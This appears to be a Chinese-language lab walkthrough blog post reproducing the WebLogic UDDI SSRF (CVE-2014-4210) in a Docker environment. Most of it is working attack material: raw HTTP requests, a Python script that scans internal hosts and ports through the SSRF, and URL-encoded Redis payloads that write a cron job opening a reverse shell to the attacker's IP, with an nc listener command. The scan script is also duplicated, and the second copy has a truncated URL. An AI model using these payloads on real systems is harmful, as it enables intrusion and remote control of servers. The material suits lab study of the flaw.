当前位置：首页 > news >正文

WebLogic UDDI (CVE-2014-4210)

news 2026/6/8 15:05:21

漏洞简介 Weblogic 中存在一个 SSRF 漏洞，利用该漏洞可以发送任意HTTP请求，进而可以攻击内网中 Redis 、 Fastcgi 等脆弱组件。漏洞生于 /uddiexplorer/SearchPublicRegistries.jsp 页面中，可以导致 SSRF ，用来攻击内网中一些 redis 和 fastcgi 之类的脆弱组件

执行如下命令启动WebLogic服务器：

docker compose up -d

服务启动后，访问http://your-ip:7001/uddiexplorer/即可查看UDDI Explorer应用，无需登录认证。

探测主机存活

1. 随机访问一个端口则会显示 could not connect ：

POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1
Host: 192.168.227.128:7001
Content-Length: 135
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Origin: http://192.168.227.128:7001
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.227.128:7001/uddiexplorer/SearchPublicRegistries.jsp
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=vnvsqjYF2YZc2ftz8hS7WR3FDQwZ2Gy5QrNTNzK42D2rLqMm4Vpl!-1893278756
Connection: keep-alive

operator=http://172.26.165.181:9999&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

2. 一个非http的协议则会返回 did not have a valid SOAP

3. 不存活的主机就No route to host

内网存活探测脚本

import requests # 1. 用你 ifconfig 查出来的真实 Kali 本地 IP url = "http://192.168.227.128:7001/uddiexplorer/SearchPublicRegistries.jsp" ports = [6378, 6379, 22, 25, 80, 8080, 8888, 8000, 7001, 7002] print("[+] 开始内网存活资产扫描探测...") for i in range(1, 255): for port in ports: # 2. 得到的 172.18.0 params = dict( rdoSearch="name", txtSearchname="sdf", selfor="Business+location", btnSubmit="Search", operator="http://172.18.0.{}:{}".format(i, port) ) try: r = requests.get(url, params=params, timeout=3) if 'could not connect over HTTP to server' not in r.text and 'No route to host' not in r.text: # 3. 【已修正】打印位置也同步修改为 172.18.0 print('[*] 成功发现内网开放服务 -> http://172.18.0.{}:{}'.format(i, port)) else: pass except: pass print("[+] 扫描结束。") import requests # 1. 【已修正】使用你 ifconfig 查出来的真实 Kali 本地 IP url = "http://172.26.165" ports = [6378, 6379, 22, 25, 80, 8080, 8888, 8000, 7001, 7002] print("[+] 开始内网存活资产扫描探测...") for i in range(1, 255): for port in ports: # 2. 【已修正】将盲猜的 172.23.0 替换为你 docker inspect 得到的 172.18.0 params = dict( rdoSearch="name", txtSearchname="sdf", selfor="Business+location", btnSubmit="Search", operator="http://172.18.0.{}:{}".format(i, port) ) try: r = requests.get(url, params=params, timeout=3) if 'could not connect over HTTP to server' not in r.text and 'No route to host' not in r.text: print('[*] 成功发现内网开放服务 -> http://172.18.0.{}:{}'.format(i, port)) else: pass except: pass print("[+] 扫描结束。")

注意在docker中复现需要先开启另一个容器

配置内网环境

查看当前容器的网段

┌──(root㉿QSS)-[/home/qss/vulhub/weblogic/ssrf]

└─# docker inspect 容器的名字 | grep -i "IPAddress"

强制在一个网段，不然脚本无法成功

┌──(root㉿QSS)-[/home/qss/vulhub/weblogic/ssrf]

└─#docker network connect ssrf_default dazzling_murdock

再次查看ok了

┌──(root㉿QSS)-[/home/qss/vulhub/weblogic/ssrf]

└─# docker inspect dazzling_murdock | grep -i "IPAddress"

"IPAddress": "172.17.0.2",

"IPAddress": "172.18.0.2",

SSRF攻击内网Redis

写定时任务

注意该靶场复现一定要有CentOS环境，没有不行

没有配好的看总结-CentOS环境配置

注意你的攻击机要监听你构造的端口，我的21

nc -lvvp 21

payload构造：

我的总结里面有构造原理，比如test，aaa作用

test set 1 "\n\n\n\n* * * * * root bash -c 'sh -i >& /dev/tcp/172.26.165.181/21 0>&1'\n\n\n\n" config set dir /var/spool/cron/ config set dbfilename crontab save aaa

用CyberChef，url，编码一次

完整的报文GET和POST都try，可能

http://172.18.0.2:6379，目标靶机的地址

GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.18.0.2:6379/test%0Aset%20x%20%22%5Cn%5Cn%5Cn%5Cn%2A%2F1%20%2A%20%2A%20%2A%20%2A%20%2Fbin%2Fbash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F172%2E26%2E165%2E181%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%2F%0Aconfig%20set%20dbfilename%20root%0Asave%0Aaaa&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search HTTP/1.1 Host: 172.26.165.181:7001 Content-Length: 0 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36 Origin: http://172.26.165.181:7001 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://172.26.165 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Connection: keep-alive

POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1 Host: 192.168.227.128:7001 Content-Length: 389 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36 Origin: http://192.168.227.128:7001 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.227.128:7001/uddiexplorer/SearchPublicRegistries.jsp Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; JSESSIONID=kj2hqjNfFK4ZDvM1yjnktQV6FBXwKdwh8LXvHDZJJxmsvQ1syxvY!-1893278756 Connection: keep-alive operator=http://172.18.0.2:6379/test%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E&%20/dev/tcp/172.26.165.181/21%200%3E&1'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20/etc/%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0Aaaa%0A%0i&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

版本太高被CPS协议拦截了

只要你的 Payload 里面带有POST或Host:等 HTTP 协议特征，Redis 就会瞬间自闭，拒绝执行任何后续命令。

要你把 Redis 的版本降低到 3.2.7 之下（例如 3.0.x 或 2.x 版本），Redis 的源码里就根本没有这段针对 POST 和 Host: 的安全检查。

总结

test，aaa作用

1. 开头的`test`：要的！用来抵消 WebLogic 自带的垃圾协议

当 WebLogic 替你向内网发包时，如果你给的参数是operator=，WebLogic 发出的网络请求第一行长这样：

GET / HTTP/1.1

如果不加test：Redis 会直接收到GET / HTTP/1.1，因为它不是标准的 Redis 命令，Redis 会报错并断开连接，你后面的set 1连执行的机会都没有。
加了test：WebLogic 发出的第一行变成了GET /test HTTP/1.1。黑客在test后面打了两个回车换行，Redis 收到后，只会把第一行GET /test HTTP/1.1当成一个坏掉的错误命令抛弃（不影响服务），然后顺着你给的两个回车换行，重新另起一行，开始清清白白地执行你的set 1。

2. 结尾的`aaa`：必须得要！用来隔离 WebLogic 屁股后面的表单脏数据

还记得你抓出来的 Burp Suite 完整报文吗？最下方长这样：

operator=你的Payload&rdoSearch=name&txtSearchname=&txtSearchkey=...

当 WebLogic 转发你的请求时，它会非常“热心”地把你 Payload 后面自带的&rdoSearch=name...这一长串表单参数，一字不差地全部粘在你 Payload 的最末尾。

如果不加aaa：Redis 收到的最后一行命令会变成：
```
save&rdoSearch=name&txtSearchname=...
```
- 后果：Redis 根本不认识save&rdoSearch=name是什么，直接报错抛弃。这就导致你最关键的 “保存到硬盘（save）” 动作在内网里根本没有被执行，文件自然不会落盘，复现失败。